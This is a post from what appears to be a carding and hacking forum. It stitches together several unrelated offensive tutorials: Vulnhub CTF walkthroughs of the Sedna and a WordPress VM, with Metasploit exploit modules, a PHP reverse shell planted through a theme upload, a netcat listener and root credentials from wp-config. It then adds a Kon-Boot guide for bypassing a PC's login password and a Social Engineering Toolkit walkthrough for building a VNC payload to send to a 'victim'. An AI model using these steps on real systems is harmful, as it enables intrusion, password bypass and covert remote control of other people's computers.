[Guide] How to Hack the Sedna VM (CTF Challenge)

[Guide] How to Hack the Sedna VM (CTF Challenge) - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the Sedna VM (CTF Challenge) (/Thread-Guide-How-to-Hack-the-Sedna-VM-CTF-Challenge)

[Guide] How to Hack the Sedna VM (CTF Challenge) - NINZA - 04-26-2020

Today we found a Vulnerable Lab based on the

[To see content please register here]

. Sedna is a dwarf planet in our solar system. This vulnerable machine was created for the Hackfest 2016. We are going to download the VM Machine from

[To see content please register here]

.
The credit for developing this VM machine goes to

[To see content please register here]

.
Penetrating Methodologies

Scanning Network

TCP and UDP ports scanning using nmap

Testing Port 80

Surfing HTTP service on Web Browser

Directory Scanning

Scanning using Nikto

Exploiting BuilderEngine

Using the Metasploit module to get a meterpreter session

Retrieving Flag 1
Exploiting chkrootkit

Using the Metasploit module to get the root shell

Retrieving Flag 2

Let’s Breach!!!
As always, Let’s start from doing a port enumeration on the IP Address using the nmap tool. (Here, we have it at 192.168.1.110 but you will have to find your own).
nmap -sV 192.168.1.110
1
nmap -sV 192.168.1.110
[Image: 1.png?w=687&ssl=1]

From the NMAP Version Scan we enumerated the following details:
As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.
[Image: 2.png?w=687&ssl=1]

Here we decided to scan the target directory using Nikto scan. Now open the terminal in Kali Linux and type the following command:
nikto -h

[To see content please register here]

1
nikto -h

[To see content please register here]

From the scanning result, we chose the highlighted file link for further enumeration. That is license.txt.
[Image: 4.png?w=687&ssl=1]

Opening the license.txt in our browser gave us our way in, as we desired. If we observe closely then we will find that we have the BuilderEngine 2015 version installed on the target system, with a little bit of research, we found that we have a module in Metasploit which we can use to get a meterpreter session.
Firstly, start up Metasploit by typing msfconsole in the terminal of Kali. After this, we will proceed by using the module and providing it with RHOST, in our case is 192.168.1.110.
use exploit/multi/http/builderengine_upload_exec
set rhosts 192.168.1.110
exploit
1
2
3
use exploit/multi/http/builderengine_upload_exec
set rhosts 192.168.1.110
exploit
After exploiting, we get a meterpreter session as shown in the given image. We used the sysinfo command to get the information about the target machine and we can observe that it is Sedna. Now, we use the pwd command to retrieve the working directory we have the shell in. It is /var/www/html/files.
[Image: 5.png?w=687&ssl=1]

Now, that we are inside the target machine all that we need is to retrieve the flags. After doing a bit enumeration here and there, we found a flag inside the /var/www directory. So, we traversed to that directory using the cd command. To read the flag we need to get a bash shell over the machine. So, we will use the shell command to get a bash shell but what we got was an improper shell. So, we will use the python one-liner to get a proper shell.
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
Since we have the proper shell now, let’s read the flag using the cat command.
After this, we navigated to the /etc directory and here we found the directory named chkrootkit. On traversing inside it, we get a README. Upon reading the README we get the version of chkrootkit. The version is found out to be 0.49.
[Image: 6.png?w=687&ssl=1]

Let’s get back to our beloved Metasploit and search for an exploit for the chkrootkit. We learned that we have a module in Metasploit that we can use to get a root shell on the target machine.
So, let’s work on it. On the Metasploit terminal. After this, we will proceed by using the module and providing it with the session id.
use exploit/unix/local/chkrootkit
set session 1
exploit
1
2
3
use exploit/unix/local/chkrootkit
set session 1
exploit
This gives us a shell whose privilege we checked using the id command. We checked the contents of the directory using the ls command. We can see the flag.txt inside this directory. Now for the final step, we will use the cat command to read the root flag.
[Image: 7.png?w=687&ssl=1]

Once again we are with the Vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for a beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post-exploitation flag on the box. You can download this VM from

[To see content please register here]

Let’s start.
Firstly, scan the target IP with an aggressive scan using Nmap tool as given in the image.
nmap -p- -A 192.168.1.24
1
nmap -p- -A 192.168.1.24
With the nmap result, you can see that port 22, 53, 80, 110, 139, 143, 445, 993 and 995 are open with the services like SSH, HTTP, and many others.
[Image: 2.png?w=687&ssl=1]

Since port 80 is working, open the victim IP 192.168.1.24 in the browser. You can see its home page in the image below :
[Image: 3.png?w=687&ssl=1]

Nmap scan also shows that robots.txt. Once accessed robots.txt it will show you that the website is in WordPress, which is exploitable to in this scenario.
[Image: 4.png?w=687&ssl=1]

Let’s check out the WordPress directory in the browser once.
[Image: 5.png?w=687&ssl=1]

Further, when I explored the following path: 192.168.1.24/wordpress/wp-login.php in the browser, I found a WordPress administrator console.
To breach administrator console of the WordPress we can use WPScan tool; now type the following command to start wpscan enumeration.
wpscan --url

[To see content please register here]

--enumerate u
1
wpscan --url

[To see content please register here]

--enumerate u
[Image: 6.png?w=687&ssl=1]

WPScan’s result will show two users as you can see in the image below. We will move forward with the admin user.
[Image: 7.png?w=687&ssl=1]

I used default login credentials i.e. admin: admin and therefore I was logged in as Admin. Now, under the console we can upload any theme, taking advantage of the rights we have obtained, we will try to upload the malicious script to achieve reverse connection from the victim’s system. The script we will use can be downloaded from

[To see content please register here]

Now copy the PHP text from *<?php to die(); and paste it as new theme under selected 404.php template.
[Image: 10.png?w=687&ssl=1]

Now type the following commands to have session through netcat :
nc –lpv 1234
1
nc –lpv 1234
Once you have the session, use the following commands to navigate around :
cd /home
ls
1
2
cd /home
ls
In /home I found the wp-admin folder which is obviously important so let’s check it for a flag using the following commands :
cd wpadmin
ls
cat flag.txt
1
2
3
cd wpadmin
ls
cat flag.txt
[Image: 12.png?w=687&ssl=1]

This way, in the above image you see that we have found our first flag.
Another important file in WordPress is Wp-config.php. Therefore, after exploring this file I found MYSQL Setting. This contained credentials for root. If you notice the image below you’ll observe that the username and password i.e. root: root password
[Image: 13.png?w=687&ssl=1]

Let’s switch the user to root and then in the root folder you will find the second flag too. So, use the following commands for the said task :
su
rootpassword!
cd /root
ls
cat flag.txt
1
2
3
4
5
su
rootpassword!
cd /root
ls
cat flag.txt
[Image: 14.png?w=687&ssl=1]

Now, we all know that cron.d is an important Linux directory and I just checked it for the sake of it and there I found our last and third flag. Use the following commands to achieve that :
cd /etc
cd cron.d
ls
cat php5
1
2
3
4
cd /etc
cd cron.d
ls
cat php5
[Image: 15.png?w=687&ssl=1]

Ohh-Yah! We have successfully captured all 3 flags. Hence, we have successfully completed the CTF.

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go… without the need to burn different CDs or USB pen drives.
Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.
You can manually download it from google playstore.
Note: need root privilegde means you need rooted phone.
Let’s start!!!
Install DriveDroid app on your smartphone and run the application.
[Image: 1.png?w=687&ssl=1]

Click on plus sign at the lower right corner to add any iso image file.
[Image: 2.png?w=687&ssl=1]

Under preference here we need to select image directories so that we can browse konboot iso image file.
[Image: 3.png?w=687&ssl=1]

Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)
[Image: 4.png?w=687&ssl=1]

Selected the koonboot iso file and it will get mounted
[Image: 5.png?w=687&ssl=1]

Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system
[Image: 7.png?w=687&ssl=1]

Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.
Select the smartphone as the boot device from the bios boot menu of the system and system will boot with koonboot.
[Image: 8.png?w=687&ssl=1]

Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.
[Image: 9.png?w=687&ssl=1]

Today in this article we are going to compromise the target through VNC payload attack. It is a very simple method for beginners.
In this tutorial, we will learn how to create a VNC payload using Social Engineering Toolkit. We will try to achieve the VNC shell of a victim’s PC.
Let’s Start!!!
Open a terminal in Kali Linux, and type “setoolkit” on it to start the Social Engineering Toolkit Framework. Select the first option to choose from the list of Social-Engineering Attacks.
Press ‘1’
[Image: 1.png?w=687]

To proceed further we will choose “Create a Payload and Listener” option.
Press ‘4’
This will show an arsenal of different payloads. As in this article, our focus is VNC, hence we will select the VNC payload.
Press ‘3’
Next Step requires an IP address on which the payload listener is to be started. In our case, it is 192.168.1.109(attacker’s IP) and after that, it will ask for the port for the reverse listener. In our case, it will be 4444
After setting up this, it starts generating VNC payload and save it under the highlighted path. Explore /root/.set/payload.exe. Send the payload.exe file to the target.
Further, it will ask to start payload listener Type “yes” and hit “Enter” this will start loading the Metasploit Framework.
[Image: 2.png?w=687]

After loading the Metasploit Framework, it runs the multi handler automatically; Now once the victim clicks on the payload file sent by the attacker, the attacker will get a VNC shell.
Great!!!!
[Image: 3.png?w=687]

Our VNC attack using set toolkit is successful and we received the victim’s VNC
shell on our system.